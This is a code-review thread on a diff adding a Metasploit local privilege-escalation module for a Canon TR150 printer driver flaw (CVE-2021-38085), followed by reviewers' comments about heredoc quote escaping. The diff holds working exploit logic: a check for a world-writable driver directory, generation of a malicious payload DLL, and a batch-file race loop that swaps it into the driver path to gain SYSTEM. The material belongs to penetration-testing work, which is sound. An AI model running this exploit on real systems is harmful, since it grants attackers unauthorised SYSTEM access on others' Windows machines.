modules/exploits/windows/local/canon_driver_privesc.rb

```diff
@@ -0,0 +1,158 @@
+          during the installation of a printer. A user can
+          elevate to SYSTEM by writing a malicious DLL to
+          the vulnerable driver directory and adding a new
+          printer with a vulnerable driver.
+
+          This module leverages the `prnmngr.vbs` script
+          to add and delete printers. Multiple runs of this
+          module may be required given successful exploitation
+          is time-sensitive.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Jacob Baines', # discovery, PoC, module
+          'Shelby Pace' # original Ricoh module
+        ],
+        'References' =>
+          [
+            [ 'CVE', '2021-38085'],
+          ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Platform' => 'win',
+        'Payload' =>
+        {
+        },
+        'SessionTypes' => [ 'meterpreter' ],
+        'Targets' =>
+          [
+            [
+              'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }
+            ]
+          ],
+        'Notes' =>
+        {
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'Reliability' => [ UNRELIABLE_SESSION ],
+          'Stability' => [ SERVICE_RESOURCE_LOSS ]
+        },
+        'DisclosureDate' => '2021-08-07',
+        'DefaultTarget' => 0
+      )
+    )
+
+    self.needs_cleanup = true
+  end
+
+  def check
+    @driver_path = ''
+    dir_name = 'C:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series'
+
+    return CheckCode::Safe('No Canon TR150 driver directory found') unless directory?(dir_name)
+
+    language_dirs = dir(dir_name)
+
+    return CheckCode::Detected('Detected Canon driver directory, but no language files') unless language_dirs.length
+
+    @driver_path = dir_name
+    @driver_path.concat('\\LanguageModules\\040C')
+    res = cmd_exec("icacls \"#{@driver_path}\"")
+    vulnerable = res.include?('\\Users:(OI)(CI)(F)')
+
+    return CheckCode::Detected('Canon driver directory does not have full permissions') unless vulnerable
+
+    vprint_status("Vulnerable driver directory: #{@driver_path}")
+    CheckCode::Appears('Canon driver directory has full permissions')
+  end
+
+  def add_printer(driver_name)
+    fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)
+
+    dll_data = generate_payload_dll
+    dll_path = "#{@driver_path}\\CNMurGE.dll"
+
+    temp_path = expand_path('%TEMP%\\CNMurGE.dll')
+    vprint_status("Writing dll to #{temp_path}")
+
+    bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat")
+    cp_cmd = "copy /y \"#{temp_path}\" \"#{dll_path}\""
+
+    # this script monitors the target dll for modification and then copies
+    # over our malicious dll. As this is a time based attack, it won't
+    # always be succuessful!
+    bat_file = <<~HEREDOC
+      attrib -a \"#{dll_path}\"
+      :repeat
+      for %%i in (\"#{dll_path}\") do echo %%~ai | find "a" >nul || goto :repeat
```

Comment:
Question but considering all the other areas have `\"` in this document, is there a reason `find "a"` isn't `find \"a\"`?. I also question if this needed given the heredoc format.

Reply:
Yeah looking at this it isn't needed, see the following example:

```
2.7.2 :002"> bat_file = <<~HEREDOC
2.7.2 :003"> "adsf"
2.7.2 :004 > HEREDOC
 => "\"adsf\"\n" 
2.7.2 :005"> bat_file = <<~HEREDOC
2.7.2 :006"> \"adsf\"
2.7.2 :007 > HEREDOC
 => "\"adsf\"\n" 
2.7.2 :008 > 
```
In both cases we still get the same output.

Reply:
Sorry that was actually a bad example but here is another case just to show what I meant:

```
2.7.2 :009"> bat_file = <<~HEREDOC
2.7.2 :010"> "#{a}"
2.7.2 :011 > HEREDOC
 => "\"psdf\"\n" 
2.7.2 :012"> bat_file = <<~HEREDOC
2.7.2 :013"> \"#{a}\"
2.7.2 :014 > HEREDOC
 => "\"psdf\"\n" 
2.7.2 :015 > 
```

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/15520/commits/f8d838bba23c787580f98789207c911917cba242